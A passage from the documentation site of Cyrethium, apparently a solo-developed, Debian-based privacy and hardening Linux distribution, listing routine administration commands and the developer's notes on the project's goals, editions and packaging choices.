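        granted = [names[c] for c in triplet if c in names]
        result[who] = "/".join(granted) or "none"
    return result
```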

Network Commands

  • ip a: Shows network interfaces
  • ping 1.1.1.1: Connection test
  • curl ifconfig.me: Shows external IP address
  • netstat -tulnp: Shows open ports
  • ss -tuln: Modern alternative
  • systemctl restart NetworkManager: Restarts network service

Package Management (Debian / Cyrethium)

  • apt update: Updates repository list
  • apt upgrade: Performs updates
  • apt install package: Installs package
  • apt remove package: Removes package
  • apt autoremove: Cleans unnecessary dependencies
  • dpkg -l: Lists installed packages

Process & Service Management

  • ps aux: Lists active processes
  • kill PID: Terminates process
  • systemctl status service: Service status
  • systemctl enable service: Enables automatic startup
  • systemctl disable service: Disables
  • systemctl stop service: Stops service

Logs & Monitoring

  • /var/log/syslog: System logs
  • /var/log/auth.log: Authentication logs
  • /var/log/dmesg: Kernel logs
  • journalctl -xe: Detailed system log
  • tail -f /var/log/syslog: Real-time log monitoring

Artstation - Community Art

Are you an artist? Share your designs, add your own touch to Cyrethium's cyberpunk spirit. Interface themes, wallpapers, posters, or concept drawings... All can be part of the community.

Whether you draw a viper design or create an anonymity scene emerging from the shadows — Cyrethium loves art, especially the original.

Designs are shared on GitHub and added to the system.

Developer Notes

Project Purpose

Each distribution has its own purpose. Cyrethium's goal is to provide persistent privacy and security in daily use — not temporary solutions, but a practical privacy layer for everyday life.

Development Status & Expectations

I develop this project alone; there may be bugs and shortcomings. Sometimes I can't perform adequate testing — that's why bug reports are crucial. I can't progress without feedback; please report any bugs, compatibility issues, or ideas you encounter.

Usage Philosophy

Cyrethium is not a passive "automatically protects everything" system — it requires some manual control. You should use it knowingly; the system cannot magically protect you. You need to use the right tools at the right time.

Versions and Security

Root0 Edition: The strongest version in terms of security. Minimum tools, minimum attack surface. Desktop security is enhanced with Wayland.

Root0 Edition is a good choice for beginners or those with little Linux knowledge.

Usability vs Security

It must be acknowledged that Cyrethium can be sluggish due to its hardening settings. You may need to compromise on ease of use for security. However, based on my experience, Cyrethium is more usable compared to many other hardened distributions; you won't feel most of the hardening in desktop use.

Packaging and Security Decisions

I don't package Cyrethium tools as .deb and there is no official repository. The reason is to reduce supply-chain risks.

This situation can be a bit troublesome for both users and me — installing/removing tools is cumbersome, but it's a conscious choice for security.

Cyrethium is completely Debian-based.

About the Website

I write the documentation section of the website in my own language first, then translate it to English. If you see translation or language errors, please let me know; I'll fix them. I do this to save time and write more detailed documentation.

Closing — A Few Personal Notes

If I have any mistakes, please point them out — there's a lot to learn.

For me, Cyrethium is not just an .iso file. Behind it are thousands of hours of effort, sleepless nights, weeks of struggling with bugs. Until reaching this point, my path was repeatedly blocked — there were people who didn't believe in my project, belittled me, or deliberately made things difficult.

Today Cyrethium is here, because I didn't give up.